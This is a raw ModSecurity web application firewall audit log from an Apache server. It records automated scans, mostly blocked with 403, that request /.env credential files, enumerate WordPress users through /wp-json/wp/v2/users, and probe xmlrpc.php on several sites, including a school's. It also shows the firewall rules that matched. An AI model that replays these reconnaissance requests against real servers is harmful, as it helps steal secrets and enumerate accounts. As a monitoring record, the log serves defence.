"210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746921767155012 932 (- - -) Stopwatch2: 1746921767155012 932; combined=450, p1=406, p2=0, p3=0, p4=0, p5=44, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d475f540-Z-- --ed6bf007-A-- [11/May/2025:07:11:41 +0700] aB_rPU8xOExV7lPH_DmyKQAAAM4 103.236.140.4 36792 103.236.140.4 8181 --ed6bf007-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016 Accept-Charset: utf-8 --ed6bf007-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed6bf007-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746922301781281 762 (- - -) Stopwatch2: 1746922301781281 762; combined=320, p1=283, p2=0, p3=0, p4=0, p5=37, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed6bf007-Z-- --89985f65-A-- [11/May/2025:07:25:23 +0700] aB_uc0EuxCpmyy5aJPnA_QAAAAI 103.236.140.4 38052 103.236.140.4 8181 --89985f65-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.101 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --89985f65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --89985f65-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746923123755880 2811 (- - -) Stopwatch2: 1746923123755880 2811; combined=1137, p1=394, p2=714, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --89985f65-Z-- --3d8bd619-A-- [11/May/2025:07:25:30 +0700] aB_uek8xOExV7lPH_Dm6HAAAANY 103.236.140.4 38272 103.236.140.4 8181 --3d8bd619-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.101 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3d8bd619-C-- demo.sayHello --3d8bd619-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d8bd619-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746923130329437 8183 (- - -) Stopwatch2: 1746923130329437 8183; combined=5972, p1=734, p2=4607, p3=134, p4=226, p5=151, sr=72, sw=120, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d8bd619-Z-- --8a3f5379-A-- [11/May/2025:07:26:24 +0700] aB_usObs1CLLACKj-_wFcQAAAI4 103.236.140.4 39778 103.236.140.4 8181 --8a3f5379-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.38.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.38.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8a3f5379-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a3f5379-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746923184243436 3629 (- - -) Stopwatch2: 1746923184243436 3629; combined=2068, p1=615, p2=1418, p3=0, p4=0, p5=35, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a3f5379-Z-- --f28f7640-A-- [11/May/2025:07:26:32 +0700] aB_uuApy530QiWmSS61_iwAAAFI 103.236.140.4 40014 103.236.140.4 8181 --f28f7640-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.38.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.38.6 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f28f7640-C-- demo.sayHello --f28f7640-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f28f7640-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746923192706700 6506 (- - -) Stopwatch2: 1746923192706700 6506; combined=4843, p1=605, p2=3994, p3=32, p4=35, p5=105, sr=76, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f28f7640-Z-- --a3f0f02e-A-- [11/May/2025:07:27:56 +0700] aB_vDObs1CLLACKj-_wF4QAAAIk 103.236.140.4 42348 103.236.140.4 8181 --a3f0f02e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.163 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a3f0f02e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3f0f02e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746923276950886 2778 (- - -) Stopwatch2: 1746923276950886 2778; combined=1229, p1=469, p2=730, p3=0, p4=0, p5=30, sr=109, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3f0f02e-Z-- --7b32b935-A-- [11/May/2025:07:28:06 +0700] aB_vFkEuxCpmyy5aJPnB6QAAABM 103.236.140.4 42612 103.236.140.4 8181 --7b32b935-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.163 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7b32b935-C-- demo.sayHello --7b32b935-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7b32b935-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746923286083860 5620 (- - -) Stopwatch2: 1746923286083860 5620; combined=4181, p1=548, p2=3398, p3=31, p4=35, p5=98, sr=73, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7b32b935-Z-- --c5de9068-A-- [11/May/2025:07:28:10 +0700] aB_vGubs1CLLACKj-_wF6wAAAJQ 103.236.140.4 42744 103.236.140.4 8181 --c5de9068-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.77.242 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.77.242 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c5de9068-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5de9068-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746923290522692 1980 (- - -) Stopwatch2: 1746923290522692 1980; combined=953, p1=321, p2=605, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5de9068-Z-- --c7577b11-A-- [11/May/2025:07:28:19 +0700] aB_vI0EuxCpmyy5aJPnCAAAAAAU 103.236.140.4 43024 103.236.140.4 8181 --c7577b11-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.77.242 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.77.242 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c7577b11-C-- demo.sayHello --c7577b11-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7577b11-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746923299575376 5253 (- - -) Stopwatch2: 1746923299575376 5253; combined=3814, p1=493, p2=3112, p3=31, p4=33, p5=86, sr=66, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7577b11-Z-- --9e842739-A-- [11/May/2025:07:29:06 +0700] aB_vUkEuxCpmyy5aJPnCZAAAAAM 103.236.140.4 44496 103.236.140.4 8181 --9e842739-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9e842739-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9e842739-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746923346688910 2944 (- - -) Stopwatch2: 1746923346688910 2944; combined=1317, p1=470, p2=819, p3=0, p4=0, p5=28, sr=130, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9e842739-Z-- --0ac2c456-A-- [11/May/2025:07:29:14 +0700] aB_vWubs1CLLACKj-_wGMwAAAIo 103.236.140.4 44716 103.236.140.4 8181 --0ac2c456-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.199 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0ac2c456-C-- demo.sayHello --0ac2c456-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0ac2c456-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746923354384810 5796 (- - -) Stopwatch2: 1746923354384810 5796; combined=4548, p1=559, p2=3640, p3=35, p4=35, p5=153, sr=72, sw=126, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ac2c456-Z-- --f3cb1444-A-- [11/May/2025:07:30:16 +0700] aB_vmApy530QiWmSS62BVAAAAFY 103.236.140.4 46354 103.236.140.4 8181 --f3cb1444-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.249 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.249 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f3cb1444-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3cb1444-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746923416144734 2714 (- - -) Stopwatch2: 1746923416144734 2714; combined=1493, p1=478, p2=982, p3=0, p4=0, p5=33, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3cb1444-Z-- --960de87c-A-- [11/May/2025:07:30:21 +0700] aB_vnQpy530QiWmSS62BYQAAAFY 103.236.140.4 46494 103.236.140.4 8181 --960de87c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.249 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.249 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --960de87c-C-- demo.sayHello --960de87c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --960de87c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746923421784109 5914 (- - -) Stopwatch2: 1746923421784109 5914; combined=4769, p1=607, p2=3925, p3=38, p4=45, p5=92, sr=76, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --960de87c-Z-- --3457a07c-A-- [11/May/2025:07:30:45 +0700] aB_vtebs1CLLACKj-_wGqgAAAJc 103.236.140.4 47094 103.236.140.4 8181 --3457a07c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.18 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.18 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3457a07c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3457a07c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746923445389008 2713 (- - -) Stopwatch2: 1746923445389008 2713; combined=1304, p1=472, p2=798, p3=0, p4=0, p5=34, sr=139, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3457a07c-Z-- --585f4313-A-- [11/May/2025:07:30:52 +0700] aB_vvObs1CLLACKj-_wGsAAAAJU 103.236.140.4 47222 103.236.140.4 8181 --585f4313-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.18 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.18 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --585f4313-C-- demo.sayHello --585f4313-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --585f4313-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746923452865874 5931 (- - -) Stopwatch2: 1746923452865874 5931; combined=4411, p1=572, p2=3553, p3=31, p4=94, p5=96, sr=73, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --585f4313-Z-- --99b7bc75-A-- [11/May/2025:07:47:00 +0700] aB_zhApy530QiWmSS62IuQAAAEI 103.236.140.4 50500 103.236.140.4 8181 --99b7bc75-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 128.199.182.55 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 128.199.182.55 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --99b7bc75-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --99b7bc75-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746924420700089 888 (- - -) Stopwatch2: 1746924420700089 888; combined=407, p1=371, p2=0, p3=0, p4=0, p5=36, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --99b7bc75-Z-- --24f68d32-A-- [11/May/2025:08:13:56 +0700] aB_51E8xOExV7lPH_DnTvQAAANE 103.236.140.4 43772 103.236.140.4 8181 --24f68d32-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 134.122.28.88 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 134.122.28.88 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --24f68d32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --24f68d32-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
